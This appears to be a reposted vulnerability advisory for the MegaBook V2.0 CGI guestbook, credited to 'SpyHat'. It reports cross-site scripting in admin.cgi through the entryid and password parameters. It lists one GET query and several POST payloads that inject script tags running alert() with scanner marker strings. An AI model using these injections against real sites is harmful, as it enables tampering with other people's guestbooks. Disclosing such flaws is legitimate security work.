| 关键词: modifypost entryid action password Guestbook Scripts script tested 66 CGI |
文章作者:SpyHatThe ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross SiteScripting, which will allow the attacker to modify the post in the guestbook. Theaffected scripts is admin.cgi URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) I have tested the script with the following query:?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>I have also tested the script with theses POST variables:action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script> |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|